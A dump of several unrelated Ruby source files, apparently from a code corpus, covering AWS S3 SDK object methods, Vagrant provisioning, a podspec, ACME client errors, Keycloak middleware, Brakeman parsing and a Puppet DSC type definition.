# Allows grantee to write the ACL for the applicable object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [Hash<String,String>] :metadata
# A map of metadata to store with the object in S3.
# @option options [String] :server_side_encryption
# The server-side encryption algorithm used when storing this object in
# Amazon S3 (for example, AES256, aws:kms).
# @option options [String] :storage_class
# By default, Amazon S3 uses the STANDARD Storage Class to store newly
# created objects. The STANDARD storage class provides high durability
# and high availability. Depending on performance needs, you can specify
# a different Storage Class. Amazon S3 on Outposts only uses the
# OUTPOSTS Storage Class. For more information, see [Storage Classes][1]
# in the *Amazon S3 Service Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html
# @option options [String] :website_redirect_location
# If the bucket is configured as a website, redirects requests for this
# object to another object in the same bucket or to an external URL.
# Amazon S3 stores the value of this header in the object metadata. For
# information about object metadata, see [Object Key and Metadata][1].
#
# In the following example, the request header sets the redirect to an
# object (anotherPage.html) in the same bucket:
#
# `x-amz-website-redirect-location: /anotherPage.html`
#
# In the following example, the request header sets the object redirect
# to another website:
#
# `x-amz-website-redirect-location: http://www.example.com/`
#
# For more information about website hosting in Amazon S3, see [Hosting
# Websites on Amazon S3][2] and [How to Configure Website Page
# Redirects][3].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html
# [2]: https://docs.aws.amazon.com/AmazonS3/latest/dev/WebsiteHosting.html
# [3]: https://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html
# @option options [String] :sse_customer_algorithm
# Specifies the algorithm to use to when encrypting the object (for
# example, AES256).
# @option options [String] :sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 to use in
# encrypting data. This value is used to store the object and then it is
# discarded; Amazon S3 does not store the encryption key. The key must
# be appropriate for use with the algorithm specified in the
# `x-amz-server-side-encryption-customer-algorithm` header.
# @option options [String] :sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :ssekms_key_id
# If `x-amz-server-side-encryption` is present and has the value of
# `aws:kms`, this header specifies the ID of the AWS Key Management
# Service (AWS KMS) symmetrical customer managed customer master key
# (CMK) that was used for the object.
#
# If the value of `x-amz-server-side-encryption` is `aws:kms`, this
# header specifies the ID of the symmetric customer managed AWS KMS CMK
# that will be used for the object. If you specify
# `x-amz-server-side-encryption:aws:kms`, but do not provide`
# x-amz-server-side-encryption-aws-kms-key-id`, Amazon S3 uses the AWS
# managed CMK in AWS to protect the data.
# @option options [String] :ssekms_encryption_context
# Specifies the AWS KMS Encryption Context to use for object encryption.
# The value of this header is a base64-encoded UTF-8 string holding JSON
# with the encryption context key-value pairs.
# @option options [Boolean] :bucket_key_enabled
# Specifies whether Amazon S3 should use an S3 Bucket Key for object
# encryption with server-side encryption using AWS KMS (SSE-KMS).
# Setting this header to `true` causes Amazon S3 to use an S3 Bucket Key
# for object encryption with SSE-KMS.
#
# Specifying this header with a PUT action doesn’t affect bucket-level
# settings for S3 Bucket Key.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [String] :tagging
# The tag-set for the object. The tag-set must be encoded as URL Query
# parameters. (For example, "Key1=Value1")
# @option options [String] :object_lock_mode
# The Object Lock mode that you want to apply to this object.
# @option options [Time,DateTime,Date,Integer,String] :object_lock_retain_until_date
# The date and time when you want this object's Object Lock to expire.
# @option options [String] :object_lock_legal_hold_status
# Specifies whether a legal hold will be applied to this object. For
# more information about S3 Object Lock, see [Object Lock][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock.html
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [Types::PutObjectOutput]
def put(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.put_object(options)
resp.data
end
# @example Request syntax with placeholder values
#
# object.restore_object({
# version_id: "ObjectVersionId",
# restore_request: {
# days: 1,
# glacier_job_parameters: {
# tier: "Standard", # required, accepts Standard, Bulk, Expedited
# },
# type: "SELECT", # accepts SELECT
# tier: "Standard", # accepts Standard, Bulk, Expedited
# description: "Description",
# select_parameters: {
# input_serialization: { # required
# csv: {
# file_header_info: "USE", # accepts USE, IGNORE, NONE
# comments: "Comments",
# quote_escape_character: "QuoteEscapeCharacter",
# record_delimiter: "RecordDelimiter",
# field_delimiter: "FieldDelimiter",
# quote_character: "QuoteCharacter",
# allow_quoted_record_delimiter: false,
# },
# compression_type: "NONE", # accepts NONE, GZIP, BZIP2
# json: {
# type: "DOCUMENT", # accepts DOCUMENT, LINES
# },
# parquet: {
# },
# },
# expression_type: "SQL", # required, accepts SQL
# expression: "Expression", # required
# output_serialization: { # required
# csv: {
# quote_fields: "ALWAYS", # accepts ALWAYS, ASNEEDED
# quote_escape_character: "QuoteEscapeCharacter",
# record_delimiter: "RecordDelimiter",
# field_delimiter: "FieldDelimiter",
# quote_character: "QuoteCharacter",
# },
# json: {
# record_delimiter: "RecordDelimiter",
# },
# },
# },
# output_location: {
# s3: {
# bucket_name: "BucketName", # required
# prefix: "LocationPrefix", # required
# encryption: {
# encryption_type: "AES256", # required, accepts AES256, aws:kms
# kms_key_id: "SSEKMSKeyId",
# kms_context: "KMSContext",
# },
# canned_acl: "private", # accepts private, public-read, public-read-write, authenticated-read, aws-exec-read, bucket-owner-read, bucket-owner-full-control
# access_control_list: [
# {
# grantee: {
# display_name: "DisplayName",
# email_address: "EmailAddress",
# id: "ID",
# type: "CanonicalUser", # required, accepts CanonicalUser, AmazonCustomerByEmail, Group
# uri: "URI",
# },
# permission: "FULL_CONTROL", # accepts FULL_CONTROL, WRITE, WRITE_ACP, READ, READ_ACP
# },
# ],
# tagging: {
# tag_set: [ # required
# {
# key: "ObjectKey", # required
# value: "Value", # required
# },
# ],
# },
# user_metadata: [
# {
# name: "MetadataKey",
# value: "MetadataValue",
# },
# ],
# storage_class: "STANDARD", # accepts STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA, INTELLIGENT_TIERING, GLACIER, DEEP_ARCHIVE, OUTPOSTS
# },
# },
# },
# request_payer: "requester", # accepts requester
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :version_id
# VersionId used to reference a specific version of the object.
# @option options [Types::RestoreRequest] :restore_request
# Container for restore job parameters.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [Types::RestoreObjectOutput]
def restore_object(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.restore_object(options)
resp.data
end
# @!group Associations
# @return [ObjectAcl]
def acl
ObjectAcl.new(
bucket_name: @bucket_name,
object_key: @key,
client: @client
)
end
# @return [Bucket]
def bucket
Bucket.new(
name: @bucket_name,
client: @client
)
end
# @param [String] id
# @return [MultipartUpload]
def multipart_upload(id)
MultipartUpload.new(
bucket_name: @bucket_name,
object_key: @key,
id: id,
client: @client
)
end
# @param [String] id
# @return [ObjectVersion]
def version(id)
ObjectVersion.new(
bucket_name: @bucket_name,
object_key: @key,
id: id,
client: @client
)
end
# @deprecated
# @api private
def identifiers
{
bucket_name: @bucket_name,
key: @key
}
end
deprecated(:identifiers)
private
def extract_bucket_name(args, options)
value = args[0] || options.delete(:bucket_name)
case value
when String then value
when nil then raise ArgumentError, "missing required option :bucket_name"
else
msg = "expected :bucket_name to be a String, got #{value.class}"
raise ArgumentError, msg
end
end
def extract_key(args, options)
value = args[1] || options.delete(:key)
case value
when String then value
when nil then raise ArgumentError, "missing required option :key"
else
msg = "expected :key to be a String, got #{value.class}"
raise ArgumentError, msg
end
end
def yield_waiter_and_warn(waiter, &block)
if !@waiter_block_warned
msg = "pass options to configure the waiter; "\
"yielding the waiter is deprecated"
warn(msg)
@waiter_block_warned = true
end
yield(waiter.waiter)
end
def separate_params_and_options(options)
opts = Set.new(
[:client, :max_attempts, :delay, :before_attempt, :before_wait]
)
waiter_opts = {}
waiter_params = {}
options.each_pair do |key, value|
if opts.include?(key)
waiter_opts[key] = value
else
waiter_params[key] = value
end
end
waiter_opts[:client] ||= @client
[waiter_opts, waiter_params]
end
class Collection < Aws::Resources::Collection
# @!group Batch Actions
# @example Request syntax with placeholder values
#
# object.batch_delete!({
# mfa: "MFA",
# request_payer: "requester", # accepts requester
# bypass_governance_retention: false,
# expected_bucket_owner: "AccountId",
# })
# @param options ({})
# @option options [String] :mfa
# The concatenation of the authentication device's serial number, a
# space, and the value that is displayed on your authentication device.
# Required to permanently delete a versioned object if versioning is
# configured with MFA delete enabled.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [Boolean] :bypass_governance_retention
# Specifies whether you want to delete this object even if it has a
# Governance-type Object Lock in place. You must have sufficient
# permissions to perform this operation.
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [void]
def batch_delete!(options = {})
batch_enum.each do |batch|
params = Aws::Util.copy_hash(options)
params[:bucket] = batch[0].bucket_name
params[:delete] ||= {}
params[:delete][:objects] ||= []
batch.each do |item|
params[:delete][:objects] << {
key: item.key
}
end
batch[0].client.delete_objects(params)
end
nil
end
# @!endgroup
end
end
end
| 42.007449 | 169 | 0.658702 |
d5dfd0f253a6b29d0a115b12fe345ae0958eb38b | 728 | # frozen_string_literal: true
# Must-support metadata for the US Core 3.1.1 Goal profile, consumed by the
# corresponding test sequence.
module Inferno
  module USCore311ProfileDefinitions
    class USCore311GoalSequenceDefinitions
      # Extensions, slices, and elements the profile marks as must-support.
      MUST_SUPPORTS = {
        extensions: [],
        slices: [
          {
            name: 'Goal.target.due[x]:dueDate',
            path: 'target.due',
            discriminator: { type: 'type', code: 'Date' }
          }
        ],
        elements: [
          { path: 'lifecycleStatus' },
          { path: 'description' },
          { path: 'subject' },
          { path: 'target' }
        ]
      }.freeze

      # No references require delayed resolution for this profile.
      DELAYED_REFERENCES = [].freeze
    end
  end
end
| 19.157895 | 47 | 0.42033 |
bb47c26306b6039d779fc4f802016001575d129d | 2,644 | #
# The MIT License (MIT)
#
# Copyright (c) 2014 Wynand Pieterse
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Version 0.1.0
#
require $setUpSerialLogging
require $setUpProvisionLogging
# Defines our control VM, the primary VM for all tasks.
# Configures the primary ("control") VM: hostname, base box, networking,
# serial/provision logging, and the shell provisioners that bootstrap
# Ansible, Docker, and the private registry. Relies on the globals
# $controlRequestImagePath, $controlDockerRegistryPort and $coreInstances
# plus the helper files required at the top of this file.
def defineControlVM(control, vmName)
  control.vm.hostname = vmName
  control.vm.box = "https://cloud-images.ubuntu.com/vagrant/utopic/#{$controlRequestImagePath}/utopic-server-cloudimg-amd64-vagrant-disk1.box"
  control.vm.network :private_network, ip: "10.10.10.10"

  # Expose the private Docker registry to the host.
  control.vm.network "forwarded_port", guest: 5000, host: $controlDockerRegistryPort, auto_correct: true

  # Optional serial console logging, if the user asked for it.
  setUpSerialLogging vmName

  # Every provisioning script appends to this per-VM log file.
  logFile = setUpProvisionLogging vmName

  # Run the provisioning scripts in order, all unprivileged.
  provision = lambda do |script, args|
    control.vm.provision :shell,
      :path => "automation/vagrant/tasks/#{script}",
      :privileged => false,
      :args => args
  end
  provision.call "ProvisionControlBase.sh", logFile.to_s
  provision.call "ProvisionControlFiles.sh", "#{logFile} #{$coreInstances}"
  provision.call "ProvisionControlAnsible.sh", logFile.to_s
  provision.call "ProvisionControlDocker.sh", logFile.to_s
  provision.call "ProvisionControlRegistry.sh", logFile.to_s
end
| 50.846154 | 158 | 0.760212 |
1133d5672235d5921904b998d5b0517f4d7c37ef | 1,664 | #
# Be sure to run `pod lib lint FZHExtension.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'FZHExtension'
s.version = '0.1.1'
s.swift_version = '3.0'
s.summary = 'Swift 总结的常用的extension - FZHExtension.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/fengzhihao123/FZHExtension.git'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { '[email protected]' => '[email protected]' }
s.source = { :git => 'https://github.com/fengzhihao123/FZHExtension.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'FZHExtension/Classes/**/*'
# s.resource_bundles = {
# 'FZHExtension' => ['FZHExtension/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 37.818182 | 110 | 0.643029 |
7aa2120918f17b13c39bc132412cb0f9bd1c1552 | 266 | require 'bundler/setup'
require 'aasm-diagram'
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = '.rspec_status'
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 22.166667 | 63 | 0.744361 |
1c4baeca1c76a1addff5da925cb06dc443b94a8b | 171 | class DropContactDetails < ActiveRecord::Migration[5.2]
def up
drop_table :contact_details
end
def down
raise ActiveRecord::IrreversibleMigration
end
end
| 17.1 | 55 | 0.760234 |
ed161200ede0ac43743abcc00754b6a7ea283a4a | 2,622 | class Acme::Client::Error < StandardError
class Timeout < Acme::Client::Error; end
class ClientError < Acme::Client::Error; end
class InvalidDirectory < ClientError; end
class UnsupportedOperation < ClientError; end
class UnsupportedChallengeType < ClientError; end
class NotFound < ClientError; end
class CertificateNotReady < ClientError; end
class ForcedChainNotFound < ClientError; end
class ServerError < Acme::Client::Error; end
class BadCSR < ServerError; end
class BadNonce < ServerError; end
class BadSignatureAlgorithm < ServerError; end
class InvalidContact < ServerError; end
class UnsupportedContact < ServerError; end
class ExternalAccountRequired < ServerError; end
class AccountDoesNotExist < ServerError; end
class Malformed < ServerError; end
class RateLimited < ServerError; end
class RejectedIdentifier < ServerError; end
class ServerInternal < ServerError; end
class Unauthorized < ServerError; end
class UnsupportedIdentifier < ServerError; end
class UserActionRequired < ServerError; end
class BadRevocationReason < ServerError; end
class Caa < ServerError; end
class Dns < ServerError; end
class Connection < ServerError; end
class Tls < ServerError; end
class IncorrectResponse < ServerError; end
ACME_ERRORS = {
'urn:ietf:params:acme:error:badCSR' => BadCSR,
'urn:ietf:params:acme:error:badNonce' => BadNonce,
'urn:ietf:params:acme:error:badSignatureAlgorithm' => BadSignatureAlgorithm,
'urn:ietf:params:acme:error:invalidContact' => InvalidContact,
'urn:ietf:params:acme:error:unsupportedContact' => UnsupportedContact,
'urn:ietf:params:acme:error:externalAccountRequired' => ExternalAccountRequired,
'urn:ietf:params:acme:error:accountDoesNotExist' => AccountDoesNotExist,
'urn:ietf:params:acme:error:malformed' => Malformed,
'urn:ietf:params:acme:error:rateLimited' => RateLimited,
'urn:ietf:params:acme:error:rejectedIdentifier' => RejectedIdentifier,
'urn:ietf:params:acme:error:serverInternal' => ServerInternal,
'urn:ietf:params:acme:error:unauthorized' => Unauthorized,
'urn:ietf:params:acme:error:unsupportedIdentifier' => UnsupportedIdentifier,
'urn:ietf:params:acme:error:userActionRequired' => UserActionRequired,
'urn:ietf:params:acme:error:badRevocationReason' => BadRevocationReason,
'urn:ietf:params:acme:error:caa' => Caa,
'urn:ietf:params:acme:error:dns' => Dns,
'urn:ietf:params:acme:error:connection' => Connection,
'urn:ietf:params:acme:error:tls' => Tls,
'urn:ietf:params:acme:error:incorrectResponse' => IncorrectResponse
}
end
| 46 | 84 | 0.757437 |
28962a9c8eef9122f2fd27ed2834df1286547b7b | 659 | module Ranker::Strategies
##
# Ranks rankables according to: http://en.wikipedia.org/wiki/Ranking#Modified_competition_ranking_.28.221334.22_ranking.29
#
class ModifiedCompetition < Strategy
# Methods:
def execute
rank = 0
scores_unique_sorted.each_with_index { |score, index|
rankables_for_score = rankables_for_score(score)
if rank == 0
create_ranking(1, score, rankables_for_score)
rank += rankables_for_score.count
else
rank += rankables_for_score.count
create_ranking(rank, score, rankables_for_score)
end
}
end
end # class
end # module
| 24.407407 | 124 | 0.664643 |
f792f3b3bdb4e041345d9f89cdea1798ff4e731e | 2,004 | module Keycloak
class Middleware
def initialize(app)
@app = app
end
def call(env)
if Keycloak.config.server_url.present?
authenticate(env)
else
@app.call(env)
end
end
def authenticate(env)
method = env["REQUEST_METHOD"]
path = env["PATH_INFO"]
query_string = env["QUERY_STRING"]
if service.need_authentication?(method, path, query_string, env)
logger.debug("Start authentication for #{method} : #{path}")
token = service.read_token(query_string, env)
decoded_token = service.decode_and_verify(token)
authentication_succeeded(env, decoded_token)
else
logger.debug("Skip authentication for #{method} : #{path}")
@app.call(env)
end
rescue TokenError => e
# authentication_failed(e.message)
# WTS-881 added failed msg to be captured by controller
# to make sure the logger to log the request and got shipped to datadog
# continue the request
env[:identity_auth_error_message] = e.message
@app.call(env)
end
def authentication_failed(message)
logger.info(message)
[401, {"Content-Type" => "application/json"}, [ { error: message }.to_json]]
end
def authentication_succeeded(env, decoded_token)
Helper.assign_current_user_id(env, decoded_token)
Helper.assign_current_authorized_party(env, decoded_token)
Helper.assign_current_user_email(env, decoded_token)
Helper.assign_current_user_locale(env, decoded_token)
Helper.assign_current_user_custom_attributes(env, decoded_token, config.custom_attributes)
Helper.assign_realm_roles(env, decoded_token)
Helper.assign_resource_roles(env, decoded_token)
Helper.assign_keycloak_token(env, decoded_token)
@app.call(env)
end
def service
Keycloak.service
end
def logger
Keycloak.logger
end
def config
Keycloak.config
end
end
end
| 28.628571 | 96 | 0.671657 |
280ea0ef98a90e9557f0e1d4defdc961003cc16f | 298 | class YoutubeVideo < Video
self.table_name = "asset_host_core_youtube_videos"
def attrs
{
"data-assethost" => "YoutubeVideo",
"data-ah-videoid" => self.videoid
}
end
def as_json
{
:class => "YoutubeVideo",
:videoid => self.videoid
}
end
end
| 16.555556 | 52 | 0.59396 |
e261739e64ce158b885c4689aae440fc78849881 | 652 | asset_directory = File.expand_path('../../../../assets', __FILE__)
asset_file_paths = Dir.glob(File.join(asset_directory, 'message-bus.js'))
asset_file_names = asset_file_paths.map{|e| File.basename(e) }
describe asset_file_names do
it 'should contain .js files' do
expect(asset_file_names).to include('message-bus.js')
end
end
asset_file_paths.each do | path |
describe "Asset file #{File.basename(path).inspect}" do
it 'should be encodable as UTF8' do
binary_data = File.open(path, 'rb'){|f| f.read }
encode_block = -> { binary_data.encode(Encoding::UTF_8) }
expect(encode_block).not_to raise_error
end
end
end | 34.315789 | 73 | 0.708589 |
d5395cb80c0e07c50206db561aeab44a95c08e44 | 293 | Binda::Api::Types::SelectionType = GraphQL::ObjectType.define do
name 'Binda_Selection'
field :value, types.String do
resolve ->(obj, args, ctx) do
obj[:value]
end
end
field :label, types.String do
resolve ->(obj, args, ctx) do
obj[:label]
end
end
end
| 17.235294 | 64 | 0.631399 |
e83883217c3e377ac63d9502f5b7f7b6a790f02d | 1,347 | module Brakeman
ASTFile = Struct.new(:path, :ast)
# This class handles reading and parsing files.
class FileParser
attr_reader :file_list
def initialize tracker
@tracker = tracker
@timeout = @tracker.options[:parser_timeout]
@app_tree = @tracker.app_tree
@file_list = {}
end
def parse_files list, type
read_files list, type do |path, contents|
if ast = parse_ruby(contents, path.relative)
ASTFile.new(path, ast)
end
end
end
def read_files list, type
@file_list[type] ||= []
list.each do |path|
file = @app_tree.file_path(path)
result = yield file, file.read
if result
@file_list[type] << result
end
end
end
def parse_ruby input, path
begin
Brakeman.debug "Parsing #{path}"
RubyParser.new.parse input, path, @timeout
rescue Racc::ParseError => e
@tracker.error e, "Could not parse #{path}"
nil
rescue Timeout::Error => e
@tracker.error Exception.new("Parsing #{path} took too long (> #{@timeout} seconds). Try increasing the limit with --parser-timeout"), caller
nil
rescue => e
@tracker.error e.exception(e.message + "\nWhile processing #{path}"), e.backtrace
nil
end
end
end
end
| 25.415094 | 149 | 0.599852 |
9169b811e0282bbbbe058a52d09a40aa30b3f6af | 1,019 | namespace :import do
require 'net/http'
desc "Runs a full import of companies, engines, genres, platforms, series, games, and optionally covers."
task :full, [:include_covers] => :environment do |_task, args|
args.with_defaults(include_covers: false)
puts 'Running a full import...'
import_tasks = [
"import:wikidata:companies",
"import:wikidata:engines",
"import:wikidata:genres",
"import:wikidata:platforms",
"import:wikidata:series",
"import:wikidata:games"
]
# Only import covers if the :include_covers argument is true.
import_tasks << "import:pcgamingwiki:covers" if args[:include_covers]
import_tasks.each do |task|
puts "Running 'rake #{task}'."
Rake::Task[task].invoke
puts
puts '-------------------------'
puts
end
puts "Import completed!"
puts "Run 'bundle exec rake rebuild:multisearch:all' to rebuild all the multisearch indices, or nothing will show up in your search results!"
end
end
| 30.878788 | 145 | 0.657507 |
1106d99013b2fe3d0b2c9d8c065458c452e7f516 | 174 | class ChangeApplicationsDocumentToApplicationDocuments < ActiveRecord::Migration[5.1]
def change
rename_table :applications_documents, :application_documents
end
end
| 29 | 85 | 0.83908 |
87f3d73765ea70e9d771b300396ebcb459e09b1f | 231 | class CreateSubmissions < ActiveRecord::Migration
def change
create_table :submissions do |t|
t.integer :student_number
t.string :site_url
t.integer :points
t.timestamps null: false
end
end
end
| 19.25 | 49 | 0.683983 |
4a5c6352ba4bf99b5623d45b2f1dafb1fd0dbcda | 372 | =begin
An example of generating swagger via gRPC ecosystem.
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: 1.0
Contact: [email protected]
Generated by: https://github.com/openapitools/openapi-generator.git
=end
class V1ExampleServiceQueryRequest < ApplicationRecord
end
| 23.25 | 106 | 0.817204 |
1a537e7e4e87e67b6579ab590da9c2c01f3afbbd | 1,767 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20161117163442) do
create_table "users", force: :cascade do |t|
t.string "username", default: "", null: false
t.string "email", default: "", null: false
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at"
t.datetime "remember_created_at"
t.integer "sign_in_count", default: 0, null: false
t.datetime "current_sign_in_at"
t.datetime "last_sign_in_at"
t.string "current_sign_in_ip"
t.string "last_sign_in_ip"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
add_index "users", ["email"], name: "index_users_on_email", unique: true
add_index "users", ["reset_password_token"], name: "index_users_on_reset_password_token", unique: true
add_index "users", ["username"], name: "index_users_on_username", unique: true
end
| 47.756757 | 104 | 0.703452 |
28992797bb2017d69361784368b67f809ce7a458 | 15,931 | require 'pathname'
Puppet::Type.newtype(:dsc_securitysetting) do
require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'
@doc = %q{
The DSC SecuritySetting resource type.
Automatically generated from
'SecurityPolicyDsc/DSCResources/MSFT_SecuritySetting/MSFT_SecuritySetting.schema.mof'
To learn more about PowerShell Desired State Configuration, please
visit https://technet.microsoft.com/en-us/library/dn249912.aspx.
For more information about built-in DSC Resources, please visit
https://technet.microsoft.com/en-us/library/dn249921.aspx.
For more information about xDsc Resources, please visit
https://github.com/PowerShell/DscResources.
}
validate do
fail('dsc_name is a required attribute') if self[:dsc_name].nil?
end
def dscmeta_resource_friendly_name; 'SecuritySetting' end
def dscmeta_resource_name; 'MSFT_SecuritySetting' end
def dscmeta_module_name; 'SecurityPolicyDsc' end
def dscmeta_module_version; '1.5.0.0' end
newparam(:name, :namevar => true ) do
end
ensurable do
newvalue(:exists?) { provider.exists? }
newvalue(:present) { provider.create }
newvalue(:absent) { provider.destroy }
defaultto { :present }
end
# Name: PsDscRunAsCredential
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_psdscrunascredential) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "PsDscRunAsCredential"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
end
end
# Name: Name
# Type: string
# IsMandatory: True
# Values: ["MinimumPasswordAge", "MaximumPasswordAge", "MinimumPasswordLength", "PasswordComplexity", "PasswordHistorySize", "LockoutBadCount", "ForceLogoffWhenHourExpire", "NewAdministratorName", "NewGuestName", "ClearTextPassword", "LSAAnonymousNameLookup", "EnableAdminAccount", "EnableGuestAccount", "ResetLockoutCount", "LockoutDuration", "MaxServiceAge", "MaxTicketAge", "MaxRenewAge", "MaxClockSkew", "TicketValidateClient"]
newparam(:dsc_name) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "Name - This is just here to avoid conflicts Valid values are MinimumPasswordAge, MaximumPasswordAge, MinimumPasswordLength, PasswordComplexity, PasswordHistorySize, LockoutBadCount, ForceLogoffWhenHourExpire, NewAdministratorName, NewGuestName, ClearTextPassword, LSAAnonymousNameLookup, EnableAdminAccount, EnableGuestAccount, ResetLockoutCount, LockoutDuration, MaxServiceAge, MaxTicketAge, MaxRenewAge, MaxClockSkew, TicketValidateClient."
isrequired
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
unless ['MinimumPasswordAge', 'minimumpasswordage', 'MaximumPasswordAge', 'maximumpasswordage', 'MinimumPasswordLength', 'minimumpasswordlength', 'PasswordComplexity', 'passwordcomplexity', 'PasswordHistorySize', 'passwordhistorysize', 'LockoutBadCount', 'lockoutbadcount', 'ForceLogoffWhenHourExpire', 'forcelogoffwhenhourexpire', 'NewAdministratorName', 'newadministratorname', 'NewGuestName', 'newguestname', 'ClearTextPassword', 'cleartextpassword', 'LSAAnonymousNameLookup', 'lsaanonymousnamelookup', 'EnableAdminAccount', 'enableadminaccount', 'EnableGuestAccount', 'enableguestaccount', 'ResetLockoutCount', 'resetlockoutcount', 'LockoutDuration', 'lockoutduration', 'MaxServiceAge', 'maxserviceage', 'MaxTicketAge', 'maxticketage', 'MaxRenewAge', 'maxrenewage', 'MaxClockSkew', 'maxclockskew', 'TicketValidateClient', 'ticketvalidateclient'].include?(value)
fail("Invalid value '#{value}'. Valid values are MinimumPasswordAge, MaximumPasswordAge, MinimumPasswordLength, PasswordComplexity, PasswordHistorySize, LockoutBadCount, ForceLogoffWhenHourExpire, NewAdministratorName, NewGuestName, ClearTextPassword, LSAAnonymousNameLookup, EnableAdminAccount, EnableGuestAccount, ResetLockoutCount, LockoutDuration, MaxServiceAge, MaxTicketAge, MaxRenewAge, MaxClockSkew, TicketValidateClient")
end
end
end
# Name: Ensure
# Type: string
# IsMandatory: False
# Values: ["Present", "Absent"]
newparam(:dsc_ensure) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "Ensure - Desired state of resource. Valid values are Present, Absent."
validate do |value|
resource[:ensure] = value.downcase
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
